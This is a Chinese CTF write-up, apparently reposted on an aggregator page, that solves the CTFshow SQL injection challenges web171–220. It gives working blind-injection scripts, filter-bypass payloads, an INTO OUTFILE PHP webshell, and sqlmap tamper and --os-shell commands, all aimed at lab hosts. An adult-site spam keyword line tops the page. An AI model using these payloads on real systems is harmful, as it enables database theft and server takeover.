日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

CTFshow sql注入 上篇(web171-220)

發布時間:2025/4/16 编程问答 53 豆豆
生活随笔 收集整理的這篇文章主要介紹了 CTFshow sql注入 上篇(web171-220) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

  • 前言
  • 題目
    • web 171(萬能密碼)
    • web 172(回顯內容過濾,base64或者hex編碼繞過)
    • web 173(回顯內容過濾,base64或者hex編碼繞過)
    • web 174 (布爾盲注丶trim盲注丶replace替換字符)
    • web 175(時間盲注 二分法和Mysql寫webshell)
    • web 176(大小寫繞過)
    • web 177(過濾空格)
    • web178 (過濾空格)
    • web179 (過濾空格)
    • web180 (過濾空格)
    • web181
    • web182
    • web183 (like盲注)
    • web184 (regexp 盲注)
    • web185(過濾數字)
    • web186(過濾數字)
    • web187(md5($password,true) 萬能密碼)
    • web188 (mysql弱類型比較)
    • web189(盲注讀文件)
    • web190(時間盲注)
    • web191(時間盲注)
    • web192(時間盲注)
    • web193(時間盲注)
      • right
      • left
    • web194(時間盲注)
    • web195(update改密碼)
    • web196
    • web197-198(插入數據)
    • web199-200(插入數據)
    • web201(sqlmap-GET)
    • web202(sqlmap-POST)
    • web203(sqlmap-PUT)
    • web204(sqlmap-cookie)
    • web205
    • web206(level)
    • web207(tamper)
    • web208(tamper)
    • 心態有點炸了,寫了十幾題,關電腦前忘記發布了,全沒了
    • web209(自定義tamper)
    • web210-212(自定義tamper)
    • web 213(--os-shell)
    • web214(時間盲注)
    • web215 (時間盲注)
    • web216(時間盲注)
    • web217-219(時間盲注)
      • benchmark
      • 笛卡爾積
      • 正則表達式
      • exp
  • web220(時間盲注)
  • 總結


前言

師傅們加油!!!


題目

web 171(萬能密碼)

//拼接sql語句查找指定ID用戶 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

id存在注入,可以直接用萬能密碼' or 1=1 %23,這時候#會把后面過濾了, where username !='flag' and id = '' or 1=1 %23條件恒成立,select語句返回所有結果

web 172(回顯內容過濾,base64或者hex編碼繞過)

(貓貓挺好玩的)

發現對username的回顯內容進行檢測

//檢查結果是否有flagif($row->username!=='flag'){$ret['msg']='查詢成功';}

可以用base64編碼或者hex編碼繞過,to_base64(),hex()

' union select hex(username),password from ctfshow_user2 where username='flag

web 173(回顯內容過濾,base64或者hex編碼繞過)

對比上題,對所有回顯內容都做了檢測

//檢查結果是否有flagif(!preg_match('/flag/i', json_encode($ret))){$ret['msg']='查詢成功';}

由于flag格式是ctfshow{XXX},所以我們的flag不會檢測到,直接用上題的payload,把ctfshow_user2改成ctfshow_user3

' union select 1,hex(username),password from ctfshow_user3 where username='flag

突然想起來,如果flag格式是ctfshow{XXX}話,過濾flag并沒有什么影響,已經知道表名,可以直接查詢password拿到flag

' union select 1,1,password from ctfshow_user3 where username='flag

web 174 (布爾盲注丶trim盲注丶replace替換字符)

過濾更嚴格了,數字也會被檢測到

//檢查結果是否有flagif(!preg_match('/flag|[0-9]/i', json_encode($ret))){$ret['msg']='查詢成功';}

試過了編碼,都沒有回顯,應該是編碼后還是存在數字,只能換個方法了

想到可以用盲注去解,保險起見現在burp抓包根據請求包寫個盲注腳本,因為ctfshow的flag是用了uuid加密,可以直接構造uuid字典uuid=string.ascii_lowercase+"-}{"+string.digits

flag格式ctfshow{xxxxxxxx(8)-xxxx(4)-xxxx(4)-xxxx(4)-xxxxxxxxxxxx(12)}
其中每個 x 是 0-9 或 a-f 范圍內的一個十六進制的數字。

布爾盲注

import requests import stringurl="http://b1c54244-c67c-41e9-80af-c6c916ee3cf2.challenge.ctf.show//api/v4.php?id=1'"uuid=string.ascii_lowercase+"-}{"+string.digits flag=""for i in range(1,46):for j in uuid: payload = "and ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag') from {0} for 1))={1}--%20&page=1&limit=10".replace(" ", "/**/").format(i,ord(j))res = requests.get(url+payload)print(j)if "admin" in res.text:flag += jprint("flag=",flag)breakelse:pass

trim盲注

# @Author:Kradress import requests import stringurl="http://b1c54244-c67c-41e9-80af-c6c916ee3cf2.challenge.ctf.show/api/v4.php?id=1'"uuid=string.ascii_lowercase+"-}{"+string.digits flag="ctfshow{"for i in range(1,46):for j in uuid: payload = f"and trim(leading '{flag}{j}' from (select group_concat(password) from ctfshow_user4 where username = 'flag'))=trim(leading '{flag}.' from (select group_concat(password) from ctfshow_user4 where username = 'flag'))--%20".replace(" ", "/**/")res = requests.get(url+payload)print(j)if "admin" not in res.text:flag += jprint("flag=",flag)breakelse:pass

看了下群主的思路,可以用replace函數去把數字替換成其他字符

replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'0',')'),'9','('),'8','*'),'7','&'),'6','^'),'5','%'),'4','$'),'3','#'),'2','@'),'1','!') # "a1b2c3d4e5" => "a!b@c3d4e5"

web 175(時間盲注 二分法和Mysql寫webshell)

本身自己寫了一個時間盲注的腳本,但是表現不佳,跑的速度太慢了,參考了Y4tacker師傅的腳本,用了二分法

import requestsurl = "http://82f3585f-b6e9-42c4-b8fa-6bd57cf51887.challenge.ctf.show/api/v5.php?id=1'"result = ''for i in range(1,40):head = 32tail = 127while head < tail:mid = (head + tail) >> 1 # 中間指針等于頭尾指針相加的一半payload = "and if(ascii(substr((select password from ctfshow_user5 where username = 'flag' ),{0},1))>{1},sleep(3),1)%23".format(i,mid)try:r = requests.get(url + payload, timeout=0.5)tail = mid except:head = mid + 1 #sleep導致超時if head != 32:result += chr(head)print(result)else:break

還有種辦法是MySQL寫webshell,可以用outfile和dumpfile來寫shell

聯合查詢

?id=' UNION ALL SELECT 1,2,'<?php echo 123;eval($_POST[0]);?>',3 into outfile '/var/www/html/1.php' %23 ?id=' UNION ALL SELECT 1,2,'<?php echo 123;eval($_POST[0])?>',3 into dumpfile '/var/www/html/1.php' %23

web 176(大小寫繞過)

用order by,得知表有3列,發現select被過濾,但可以用大小寫繞過

1' union sElect 1,2, group_concat(password) from `ctfshow_user`--

web 177(過濾空格)

可以用這些代替空格

%09 %0a %0d %0c /**/ + 1'%0aunion%0asElect%0a1,2,%0agroup_concat(password)%0afrom%0a`ctfshow_user`%23

web178 (過濾空格)

上題的也可以解出來,換個方式

1'or'1'='1'%23

web179 (過濾空格)

%0c沒被過濾

1'%0cunion%0csElect%0c1,2,%0cgroup_concat(password)%0cfrom%0c`ctfshow_user`%23

web180 (過濾空格)

發現#也被過濾了,而且只能回顯一行

-1'%0cunion%0csElect'1',(sElect%0cgroup_concat(password)from`ctfshow_user`),'3

web181

過濾了所有空格

//對傳入的參數進行了過濾function waf($str){return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);} -1'or(username)='flag

web182

這次過濾了flag,不過可以通過查詢id來那道flag

//對傳入的參數進行了過濾function waf($str){return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);}

看了下上題,flag的id是26

-1'or(id)='26

web183 (like盲注)

直接寫個盲注腳本吧

import requests import stringurl = 'http://ec30edd1-31ee-45ae-9db4-7db5f4b6c83d.challenge.ctf.show/select-waf.php' uuid = string.digits+string.ascii_lowercase+"-}" passwd = "`ctfshow_user`where(pass)like'ctfshow{"for i in range(40):for char in uuid:data = {'tableName' : passwd +f"{char}%'"}res = requests.post(url, data=data)if "$user_count = 1;" in res.text:passwd += charprint(passwd)break

web184 (regexp 盲注)

比上題更加嚴格,但是可以用空格

import requests import stringurl = 'http://e62dd2da-6dc5-4d4c-8907-ab198e411f30.challenge.ctf.show/select-waf.php' uuid = string.digits+string.ascii_lowercase+"-}" passwd = 'ctfshow_user group by pass having pass regexp(0x63746673686f777b' #ctfshow{for i in range(40):for char in uuid:data = {'tableName' : passwd +f"{hex(ord(char))[2:]})"}res = requests.post(url, data=data)if "$user_count = 1;" in res.text:passwd += hex(ord(char))[2:]print(passwd)break

web185(過濾數字)

expression值
false0
true1
true+true2
floor(pi())3
ceil(pi())4
floor(pi())+true5
floor(pi())+floor(pi())6
floor(pi())+ceil(pi())7
ceil(pi())+ceil(pi())8
floor(pi())*floor(pi())9
floor(pi())*floor(pi())+true10

waf不讓用數字和字符串(過濾單引號雙引號),可以用regex(concat(char(xxx),char(xxx)...))解

# @Author:Kradress from operator import concat import requests import stringurl = 'http://814f9d18-e43c-4dad-bdb7-489f7a423606.challenge.ctf.show/select-waf.php' uuid = string.digits+string.ascii_lowercase+"-}" passwd = 'ctfshow_user group by pass having pass regexp(' #ctfshow{ flag = 'ctfshow{'def numToStr1(str):parts = []for s in str:parts.append(numToStr2(s))res = ','.join(parts)return f"concat({res})"def numToStr2(num):parts = []n = ord(num)for i in range(n):parts.append("true")res = "+".join(parts)return f"char({res})"for i in range(40):for char in uuid:data = {'tableName' : passwd + f"{numToStr1(flag+char)})"}res = requests.post(url, data=data)if "$user_count = 1;" in res.text:flag += charprint(flag)break

web186(過濾數字)

同上

web187(md5($password,true) 萬能密碼)

看到md5($password,true),立馬想到可以用萬能密碼繞過

ffifdyop 129581926211651571912466741651878684928

web188 (mysql弱類型比較)

參考博客 MySQL學習之弱類型

進行下列語句查詢的時候,會發生隱式的數據類型轉換,當username為0的時候,也會返回所有username為非0開頭的字符串

$sql = "select pass from ctfshow_user where username = {$username}"; username=0&password=0

web189(盲注讀文件)

題目提示flag在/api/index.php中,猜測用load_file讀文件.可以用like或者regexp匹配,也可以用loacte函數獲取flag的下標,然后截取比較
盲注的話要尋找判斷回顯的地方,可以發現當用戶名和密碼為0時,顯示密碼錯誤,用戶名為其他值的時候顯示查詢失敗.

題目把and or & |都過濾了,不過 where username = {$username} 沒有引號包裹可以直接傳數字.用if或者case就可以了

# @Author:Kradress from operator import concat import requests import stringurl = 'http://2e697a15-84fe-4c2d-988f-37edb5260613.challenge.ctf.show/api/' uuid = string.digits+string.ascii_lowercase+"-}" passwd = "if(load_file('/var/www/html/api/index.php')regexp('ctfshow{" #ctfshow{ flag = 'ctfshow{'for i in range(40):for char in uuid:print(char)data = {'username' : passwd + f"{char}'),0,1)",'password' : 0}res = requests.post(url, data=data)if "\\u5bc6\\u7801\\u9519\\u8bef" in res.text:passwd += charprint(passwd)break

web190(時間盲注)

發現沒對username進行過濾,可以用sleep,直接上時間盲注

exp

# @Author:Kradress import requestsurl = "http://3cc6c564-6d1b-445c-9503-2cd45a50ea3c.challenge.ctf.show/api/"result = ''# 爆表名 # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # 爆列名 # payload = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_fl0g'" #爆字段值 payload = "select f1ag from `ctfshow_fl0g`"for i in range(40,50):head = 32tail = 127while head < tail:mid = (head + tail) >> 1 # 中間指針等于頭尾指針相加的一半# print(mid)data = {'username' : f"admin' and if(ascii(substr(({payload}),{i},1))>{mid},sleep(3),1)#",'password' : 0}try:r = requests.post(url, data, timeout=0.8)tail = mid except:head = mid + 1 #sleep導致超時if head != 32:result += chr(head)print(result)else:break

web191(時間盲注)

ascii改同名函數ord,其他同上

web192(時間盲注)

不給用ascii就不用了

exp

# @Author:Kradress import requests import stringurl = "http://36918409-2772-42d0-8ecb-bfbad2f46695.challenge.ctf.show/api/"result = ''# 爆表名 # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # 爆列名 # payload = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_fl0g'" #爆字段值 payload = "select f1ag from `ctfshow_fl0g`" uuid = string.ascii_lowercase+string.digits+"{-_}"for i in range(1,50):for char in uuid:data = {'username' : f"admin' and if(substr(({payload}),{i},1)='{char}',sleep(3),1)#",'password' : 0}try:r = requests.post(url, data, timeout=0.8)except:result += char #sleep導致超時print(result)breakif char == '}':break

web193(時間盲注)

strsub不給用了,mid、leift、right都可以

right

從右邊開始截取,配合ascii使用.
ascii('str')返回字符串的第一個字符的ascii碼
ascii(right('abc',2))= 97相當于 ascii(‘bc’)=97

left

從左邊開始截取,用reverse反轉

ascii(reverse(left('abc',2))) = 97 相當于 ascii(‘bc’)=97

mid和strsub效果一樣,代碼同上

web194(時間盲注)

繼續白嫖

web195(update改密碼)

本身開始想用下列語句的,但是返回查詢失敗

admin;update`ctfshow_user`set`pass`=123

檢查了下語句沒有被過濾,但是發現$username沒有被單引號包裹,可以用十六進制或者unhex(hex())繞過

$sql = "select pass from ctfshow_user where username = {$username};";

payload

username=0x61646d696e;update`ctfshow_user`set`pass`=123&password=123

web196

長度限制了又過濾了select,除了爆破想不到還有什么方法可以解出來

看了其他師傅wp,實際上沒有過濾select…

username=0;select(1)&password=1

web197-198(插入數據)

into被禁用了但是insert還能用

username:0;insert ctfshow_user(`username`,`pass`) value(0,0); passworf:0

web199-200(插入數據)

由于是row[0]==$password比較,show tables的row[0]結果就是ctfshow_user

username: 0;show tables; password: ctfshow_user

web201(sqlmap-GET)

好久沒用sqlmap了,還得看一下之前學習的文檔

提示:

f12拿到referer


直接跑sqlmap

sqlmap -u http://1873c128-66d1-40c8-ad64-ce073560ced7.challenge.ctf.show/api/?id=1 --refer=http://1873c128-66d1-40c8-ad64-ce073560ced7.challenge.ctf.show/sqlmap.php

得知id存在注入點,還列舉了布爾時間盲注以及聯合注入的payload

以下為sqlmap常見的用法

當前數據庫 參數:--current-db 返還當前連接的數據庫。列舉數據庫表 參數:--tables,--exclude-sysdbs,-D 當前用戶有權限讀取包含所有數據庫表信息的表中的時候,即可列出一個特定數據的所有表。 如果你不提供-D參數來列指定的一個數據的時候,sqlmap會列出數據庫所有庫的所有表。 --exclude-sysdbs參數是指包含了所有的系統數據庫。 需要注意的是在Oracle中你需要提供的是TABLESPACE_NAME而不是數據庫名稱。列舉數據庫表中的字段 參數:--columns,-C,-T,-D 當前用戶有權限讀取包含所有數據庫表信息的表中的時候,即可列出指定數據庫表中的字段,同時也會列出字段的數據類型。 如果沒有使用-D參數指定數據庫時,默認會使用當前數據庫。獲取整個表的數據 參數:--dump,-C,-T,-D,--start,--stop,--first,--last 如果當前管理員有權限讀取數據庫其中的一個表的話,那么就能獲取真個表的所有內容。 使用-D,-T參數指定想要獲取哪個庫的哪個表,不適用-D參數時,默認使用當前庫。

爆表名

sqlmap -u http://1873c128-66d1-40c8-ad64-ce073560ced7.challenge.ctf.show/api/?id=1 --refer=ctf.show --current-db --tables


爆字段

sqlmap -u http://1873c128-66d1-40c8-ad64-ce073560ced7.challenge.ctf.show/api/?id=1 --refer=ctf.show --current-db --tables -T ctfshow_user --columns

爆字段值

sqlmap -u http://1873c128-66d1-40c8-ad64-ce073560ced7.challenge.ctf.show/api/?id=1 --refer=ctf.show --current-db --tables -T ctfshow_user --columns -C pass -dump

web202(sqlmap-POST)

這題要用post傳參

#http數據 #參數 --data #此參數是把數據以post方式提交,sqlmap會自動檢測post參數 sqlmap.py -u http://192.168.0.103/06/vul/sqli/sqli_id.php --data="id=1&submit=查詢"

直接爆字段值

sqlmap -u http://8871fb1e-1ab8-45d4-af62-eda76e077947.challenge.ctf.show/api/ --data="id=1" --refer=ctf.show --current-db --tables -T ctfshow_user --columns -C pass -dump

web203(sqlmap-PUT)

–method 指定 put 請求方式,url 要帶 index.php,還要加上 --headers=“Content-Type: text/plain” 便于 put 接收表單參數。

直接爆字段值

sqlmap -u http://7839878a-635c-449f-b72a-941bbb3d9977.challenge.ctf.show/api/index.php --method=PUT --headers="Content-Type: text/plain" --data="id=1" --refer=ctf.show --current-db --tables -T ctfshow_user --columns -C pass -dump

web204(sqlmap-cookie)

–cookie 輸入cookie的請求參數

F12拿到cookie值

直接爆字段值

sqlmap -u http://ffe9c741-aee2-4314-bfd3-39845cc9c872.challenge.ctf.show/api/index.php --cookie=c3fda8fa42ca6b9d76d76a2eee8a97be --method=PUT --headers="Content-Type: text/plain" --data="id=1" --refer=ctf.show --current-db --tables -T ctfshow_user --columns -C pass -dump

web205

抓包發現先訪問/api/getToken.php頁面,驗證PHPSESSID后才能通過,去訪問/api/

1、--safe-url:提供一個安全不錯誤的連接,每隔一段時間都會去訪問一下。 2、--safe-freq:提供一個安全不錯誤的連接,每次測試請求之后都會再訪問一遍安全連接。 sqlmap -u http://128536eb-f78e-4b9b-8a53-b7e923fdd66e.challenge.ctf.show/api/index.php --method=PUT --headers="Content-Type: text/plain" --data="id=1" --refer=ctf.show --safe-url=http://128536eb-f78e-4b9b-8a53-b7e923fdd66e.challenge.ctf.show/api/getToken.php --safe-freq=1 --current-db --tables -T ctfshow_flax --columns -C flagx --dump

web206(level)

用上題的繼續打,逐不出來,可以提高level等級,個人理解提高level就會執行更多的payload,同時執行速度也會變慢

--level=LEVEL 設置測試等級(1-5,默認為 1) sqlmap -u http://3d0cde40-c5a5-48b2-b486-215a504dee67.challenge.ctf.show/api/index.php --safe-url=http://3d0cde40-c5a5-48b2-b486-215a504dee67.challenge.ctf.show/api/getToken.php --safe-freq=1 --method=PUT --headers="Content-Type: text/plain" --data="id=1" --dbms=mysql --current-db --tables -T ctfshow_flaxc --columns -C flagv --dump --level=3

web207(tamper)

過濾了空格,可以用--tamper來修改注入的數據

常見的tamper腳本

space2comment.py用/**/代替空格apostrophemask.py用utf8代替引號equaltolike.pylike代替等號space2dash.py 繞過過濾‘=’ 替換空格字符(”),(’–‘)后跟一個破折號注釋,一個隨機字符串和一個新行(’n’)greatest.py 繞過過濾’>’ ,用GREATEST替換大于號。space2hash.py空格替換為#號,隨機字符串以及換行符apostrophenullencode.py繞過過濾雙引號,替換字符和雙引號。halfversionedmorekeywords.py當數據庫為mysql時繞過防火墻,每個關鍵字之前添加mysql版本評論space2morehash.py空格替換為 #號 以及更多隨機字符串 換行符appendnullbyte.py在有效負荷結束位置加載零字節字符編碼ifnull2ifisnull.py 繞過對IFNULL過濾,替換類似’IFNULL(A,B)’為’IF(ISNULL(A), B, A)’space2mssqlblank.py(mssql)空格替換為其它空符號base64encode.py 用base64編碼替換space2mssqlhash.py 替換空格modsecurityversioned.py過濾空格,包含完整的查詢版本注釋space2mysqlblank.py 空格替換其它空白符號(mysql)between.py用between替換大于號(>)space2mysqldash.py替換空格字符(”)(’ – ‘)后跟一個破折號注釋一個新行(’ n’)multiplespaces.py圍繞SQL關鍵字添加多個空格space2plus.py用+替換空格bluecoat.py代替空格字符后與一個有效的隨機空白字符的SQL語句,然后替換=為likenonrecursivereplacement.py雙重查詢語句,取代SQL關鍵字space2randomblank.py代替空格字符(“”)從一個隨機的空白字符可選字符的有效集sp_password.py追加sp_password’從DBMS日志的自動模糊處理的有效載荷的末尾chardoubleencode.py雙url編碼(不處理以編碼的)unionalltounion.py替換UNION ALLSELECT UNION SELECTcharencode.py url編碼randomcase.py隨機大小寫unmagicquotes.py寬字符繞過 GPCaddslashesrandomcomments.py用/**/分割sql關鍵字charunicodeencode.py字符串 unicode 編碼securesphere.py追加特制的字符串versionedmorekeywords.py注釋繞過space2comment.py替換空格字符串(‘‘) 使用注釋‘/**/’halfversionedmorekeywords.py關鍵字前加注釋 sqlmap -u http://7cea92bf-aaf3-41a2-8f26-099184397e8c.challenge.ctf.show/api/index.php --safe-url=http://7cea92bf-aaf3-41a2-8f26-099184397e8c.challenge.ctf.show/api/getToken.php --safe-freq=1 -method=PUT --headers="Content-Type: text/plain" --data="id=1" --dbms=mysql --current-db --tables -T ctfshow_flaxca --columns -C flagvc --dump --level=3 --tamper=space2comment

web208(tamper)

過濾了空格,可以用--tamper來修改注入的數據

常見的tamper腳本

space2comment.py用/**/代替空格apostrophemask.py用utf8代替引號equaltolike.pylike代替等號space2dash.py 繞過過濾‘=’ 替換空格字符(”),(’–‘)后跟一個破折號注釋,一個隨機字符串和一個新行(’n’)greatest.py 繞過過濾’>’ ,用GREATEST替換大于號。space2hash.py空格替換為#號,隨機字符串以及換行符apostrophenullencode.py繞過過濾雙引號,替換字符和雙引號。halfversionedmorekeywords.py當數據庫為mysql時繞過防火墻,每個關鍵字之前添加mysql版本評論space2morehash.py空格替換為 #號 以及更多隨機字符串 換行符appendnullbyte.py在有效負荷結束位置加載零字節字符編碼ifnull2ifisnull.py 繞過對IFNULL過濾,替換類似’IFNULL(A,B)’為’IF(ISNULL(A), B, A)’space2mssqlblank.py(mssql)空格替換為其它空符號base64encode.py 用base64編碼替換space2mssqlhash.py 替換空格modsecurityversioned.py過濾空格,包含完整的查詢版本注釋space2mysqlblank.py 空格替換其它空白符號(mysql)between.py用between替換大于號(>)space2mysqldash.py替換空格字符(”)(’ – ‘)后跟一個破折號注釋一個新行(’ n’)multiplespaces.py圍繞SQL關鍵字添加多個空格space2plus.py用+替換空格bluecoat.py代替空格字符后與一個有效的隨機空白字符的SQL語句,然后替換=為likenonrecursivereplacement.py雙重查詢語句,取代SQL關鍵字space2randomblank.py代替空格字符(“”)從一個隨機的空白字符可選字符的有效集sp_password.py追加sp_password’從DBMS日志的自動模糊處理的有效載荷的末尾chardoubleencode.py雙url編碼(不處理以編碼的)unionalltounion.py替換UNION ALLSELECT UNION SELECTcharencode.py url編碼randomcase.py隨機大小寫unmagicquotes.py寬字符繞過 GPCaddslashesrandomcomments.py用/**/分割sql關鍵字charunicodeencode.py字符串 unicode 編碼securesphere.py追加特制的字符串versionedmorekeywords.py注釋繞過space2comment.py替換空格字符串(‘‘) 使用注釋‘/**/’halfversionedmorekeywords.py關鍵字前加注釋

waf是沒有區分大小寫的,可以隨機大小寫繞過(randomcase.py),多個tamper用,分隔

sqlmap -u http://9cd7a826-e21c-4097-8d19-a2f8ecba5406.challenge.ctf.show/api/index.php --safe-url=http://9cd7a826-e21c-4097-8d19-a2f8ecba5406.challenge.ctf.show/api/getToken.php --safe-freq=1 -method=PUT --headers="Content-Type: text/plain" --data="id=1" --dbms=mysql --current-db --tables -T ctfshow_flaxcac --dump --level=3 --tamper="space2comment,randomcase"

心態有點炸了,寫了十幾題,關電腦前忘記發布了,全沒了

web209(自定義tamper)

這題我們可以自己寫tamper,可以參考一下space2comment,只要對tamper函數中傳入得payload進行替換,然后在retrun替換后得結果就好了

直接用utools的everything插件搜下tamper(強烈安利)


把spce2comment的內容復制下,新建一個python腳本(ctfshow209.py)

#!/usr/bin/env python""" Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """from lib.core.compat import xrange from lib.core.enums import PRIORITY__priority__ = PRIORITY.LOWdef dependencies():passdef tamper(payload, **kwargs):retVal = payloadretVal = retVal.replace("=", " like ")retVal = retVal.replace(" ", chr(0x0a))return retVal

web210-212(自定義tamper)

//對查詢字符進行解密function decode($id){return strrev(base64_decode(strrev(base64_decode($id))));}

直接反著來即可

#!/usr/bin/env python""" Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """from lib.core.compat import xrange from lib.core.enums import PRIORITY from base64 import *__priority__ = PRIORITY.LOWdef dependencies():passdef tamper(payload, **kwargs):retVal = payloadretVal = retVal.replace("-- -", "#")retVal = b64encode("".join(reversed(b64encode("".join(reversed(retVal)).encode('utf-8')).decode('utf-8'))).encode('utf-8')).decode('utf-8')return retVal

211和212的可以直接在tamper腳本里面對payload進行替換,也可以用多個tamper腳本

web 213(–os-shell)

sqlmap -u http://97a2ce63-a000-4020-838b-9eccc076d657.challenge.ctf.show/api/index.php --data="id=1" --method=PUT --headers="Content-Type: text/plain" --safe-url="http://97a2ce63-a000-4020-838b-9eccc076d657.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=ctfshow210.py -os-shell

默認選php,上傳路徑/var/www/html,發現生成了2個php文件,一個文件上傳一個命令執行的,任選一個getshell即可

web214(時間盲注)

找了半天不知道注入點在哪里,后面看了其他師傅wp,要提交ip和debug(有點坑)

# @Author:Kradress import requestsurl = "http://1de6f9ac-fd93-4893-bedb-1c82c0648cad.challenge.ctf.show/api/"result = ''# 爆表名 # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # 爆列名 # payload = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagx'" #爆字段值 payload = "select flaga from `ctfshow_flagx`"for i in range(1,50):head = 32tail = 127while head < tail:mid = (head + tail) >> 1 # 中間指針等于頭尾指針相加的一半# print(mid)data = {'ip' : f"if(ascii(substr(({payload}),{i},1))>{mid},sleep(3),1)#",'debug' : '0'}try:r = requests.post(url, data, timeout=0.8)tail = mid except:head = mid + 1 #sleep導致超時if head != 32:result += chr(head)print(result)else:break

web215 (時間盲注)

多了個單引號

# @Author:Kradress import requestsurl = "http://c458b304-838a-4cbe-b1cb-9d5643e0f95b.challenge.ctf.show/api/"result = ''# 爆表名 # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # 爆列名 # payload = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxc'" #爆字段值 payload = "select flagaa from `ctfshow_flagxc`"for i in range(1,50):head = 32tail = 127while head < tail:mid = (head + tail) >> 1 # 中間指針等于頭尾指針相加的一半# print(mid)data = {'ip' : f"' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(3),1)#",'debug' : '0'}try:r = requests.post(url, data, timeout=0.8)tail = mid except:head = mid + 1 #sleep導致超時if head != 32:result += chr(head)print(result)else:break

web216(時間盲注)

where id = from_base64($id);

把括號閉合了就好了,影響不大

# @Author:Kradress import requestsurl = "http://eea43a69-b1c9-4ebd-a637-24ee0754d774.challenge.ctf.show/api/"result = ''# 爆表名 # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # 爆列名 # payload = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxcc'" #爆字段值 payload = "select flagaac from `ctfshow_flagxcc`"for i in range(1,50):head = 32tail = 127while head < tail:mid = (head + tail) >> 1 # 中間指針等于頭尾指針相加的一半# print(mid)data = {'ip' : f"1) or if(ascii(substr(({payload}),{i},1))>{mid},sleep(3),1)#",'debug' : '0'}try:r = requests.post(url, data, timeout=0.8)tail = mid except:head = mid + 1 #sleep導致超時if head != 32:result += chr(head)print(result)else:break

web217-219(時間盲注)

這題過濾了sleep ,替換的方式有很多

benchmark

benchmark #可以測試某些特定操作的執行速度。參數可以是需要執行的次數和表達式。

select benchmark(1e7,sha1('kradress')); # 2.24s select benchmark(1e7*(1=1),sha1('kradress')) #2.57s select benchmark(1e7*(1=2),sha1('kradress')) #0s

笛卡爾積

這種方法又叫做heavy query,可以通過選定一個大表來做笛卡兒積,但這種方式執行時間會幾何倍數的提升,在站比較大的情況下會造成幾何倍數的效果,實際利用起來非常不好用

-- 可以代替sleep select if(1=1,(select count(*) from information_schema.columns A, information_schema.columns B,information_schema.columns C),0);

正則表達式

正側匹配在匹配較長字符串但自由度比較高的字符串時會造成比較大的計算量,我們通過rpad或repeat構造長字符串,加以計算量大的pattern,通過控制字符串長度我們可以控制延時

SELECT if(1=1,(select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b')),0)

exp

這幾題經常出錯,做了幾個小時就做出217,試不出來,麻了.本身想放棄了,又手動測試了題目環境應該是沒問題了,問題也可能出在自己寫的代碼里面,后面意識到不一定是服務端那邊響應時間導致的,我給服務器發送請求也是要經過一定時間的,可以通過在源碼里加sleep函數來減小誤差

217

# @Author:Kradress from time import sleep import requestsurl = "http://b0b32c4b-d4d4-4ea1-8cba-39c7da213542.challenge.ctf.show/api/"result = ''# 爆表名 # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # 爆列名 # payload = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxccb'" #爆字段值 payload = "select flagaabc from `ctfshow_flagxccb`"for i in range(1,50):head = 32tail = 127while head < tail:sleep(1)mid = (head + tail) >> 1 # 中間指針等于頭尾指針相加的一半print(mid)data = {'ip' : f"-1) or benchmark(4e6*(ascii(substr(({payload}),{i},1))>{mid}),sha1('kradress'))#",# 'ip' : "-1)+or+if(1>0,concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b',1)#",'debug' : '1'}try:r = requests.post(url, data, timeout=1)tail = mid except:head = mid + 1 #sleep導致超時if head != 32:result += chr(head)print(result)else:break

218-219

# @Author:Kradress from time import sleep import requestsurl = "http://d3acf855-ded7-4f06-9fe8-d6c38215602b.challenge.ctf.show/api/"result = ''# 爆表名 # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # 爆列名 # payload = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxc'" #爆字段值 #218 #payload = "select flagaac from ctfshow_flagxc" #219 #payload = "select flagaabc from ctfshow_flagxca"for i in range(1,50):head = 32tail = 127while head < tail:sleep(1)mid = (head + tail) >> 1 # 中間指針等于頭尾指針相加的一半# print(mid)data = {'ip' : f"-1) or if(ascii(substr(({payload}),{i},1))>{mid},(select count(*) from information_schema.columns A, information_schema.columns B,information_schema.schemata C),1",'debug' : '1'}try:r = requests.post(url, data, timeout=1)tail = mid except:head = mid + 1 #sleep導致超時if head != 32:result += chr(head)print(result)else:break

web220(時間盲注)

看起來過濾挺多的

